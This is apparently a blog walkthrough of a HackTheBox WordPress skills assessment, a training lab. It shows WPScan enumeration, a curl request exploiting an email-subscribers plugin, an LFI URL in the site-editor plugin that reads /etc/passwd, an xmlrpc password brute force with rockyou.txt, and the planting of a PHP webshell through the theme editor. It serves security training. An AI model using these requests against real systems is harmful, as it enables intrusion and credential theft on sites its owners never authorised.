HackTheBox - Hacking WordPress - Skills Assessment Walkthrough


Scenario
You have been contracted to perform an external penetration test against the company INLANEFREIGHT
that is hosting one of their main public-facing websites on WordPress.
Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.
Walkthrough
Target system 10.129.204.37
While navigating the website, we notice a 'Blog' button:
Let’s add it to /etc/hosts
:
sudo sh -c 'echo "10.129.204.37 blog.inlanefreight.local " >> /etc/hosts'
And we're ready to start!
Q1 - Identify the WordPress version number.
Solution:
We can do this manually by reviewing the client’s source code, CSS, JavaScript, and readme.html
. However, I will use the WPScan tool to quickly gather all the information about the WordPress web application and answer the next few questions:
wpscan --url http://blog.inlanefreight.local
The WordPress version of the web application has been found !
Q2 - Identify the WordPress theme in use.
Solution:
We can find this information in the scan we performed in the previous question:
The WordPress theme in use has been found !
Q3 - Submit the contents of the flag file in the directory with directory listing enabled.
Solution:;:
We can find this information in the scan we performed in the first question:
Let’s navigate to http://blog.inlanefreight.local/wp-content/uploads/
:
And we can see upload_flag.txt
file, let’s click it:
Flag found !
Q4 - Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)
Solution:
Let's run enumeration on the WordPress web application:
wpscan --url http://blog.inlanefreight.local --enumerate
We can see the users found through this process:
A non-admin user has been found !
Q5 - Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
Solution:
During the initial scan in question 1, we identified the following vulnerable plugins due to their outdated versions:
We have identified three plugins that are not up to date:
email-subscribers
version4.2.2
site-editor
version1.1.1
the-events-calendar
version5.1.2.1
The next step is to find a known vulnerability in one of these plugins that would allow us to download files without authentication.
After some Google searching, we found the following exploit:
https://www.exploit-db.com/exploits/48698
This exploit takes advantage of an old version of the email-subscribers
plugin to download user reports without any authorization. Let’s use this exploit with curl
by targeting the path specified:
curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'
The response is:
And the flag has been found !
Q6 - What is the version number of the plugin vulnerable to an LFI?
Solution:
We conducted another Google search for specific vulnerabilities affecting the following plugins:
email-subscribers
version 4.2.2
site-editor
version 1.1.1
the-events-calendar
version 5.1.2.1
We specifically looked for Local File Inclusion (LFI) vulnerabilities. After the search, we found that:
We identified the specific plugin version vulnerable to the LFI vulnerability !
Q7 - Use the LFI to identify a system user whose name starts with the letter "f".
Solution:
We just need to use a known exploit for site-editor
version 1.1.1
to exploit the LFI vulnerability.
You can find the exploit on Exploit-DB:
https://www.exploit-db.com/exploits/44340
Now, let’s use the PoC (Proof-of-Concept):
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Then, enter the URL path in our web application:
http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
User found !
Q8 - Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
Solution:
First, we need to find the credentials of an admin user:
wpscan --password-attack xmlrpc -t 20 -U erika,admin -P ./Desktop/rockyou.txt --url http://blog.inlanefreight.local
--password-attack xmlrpc
- will perform a password attack against the xmlrpc file.
-t 20
- number of threads used,
-U erika,admin
- list users to attack.
-P ./Desktop/rockyou.txt
- use the rockyou.txt
passwords file for the attack
We have obtained the username and password of an admin user.
Next, navigate to the WordPress login page at http://blog.inlanefreight.local/wp-admin
and log in using Erika’s credentials:
Then, on the main page, go to Appearance
and select Theme Editor
:
Access an unused theme template (I used twentyseventeen
) and insert the PHP webshell code into the 404 template
file:
Finally, update the file.
Then, use curl
to interact with the webshell.
First, run whoami
to verify it’s working:
And it works !
Then, locate a file in /home/erika
and output its content:
Flag successfully found ! 😁
Subscribe to my newsletter
Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
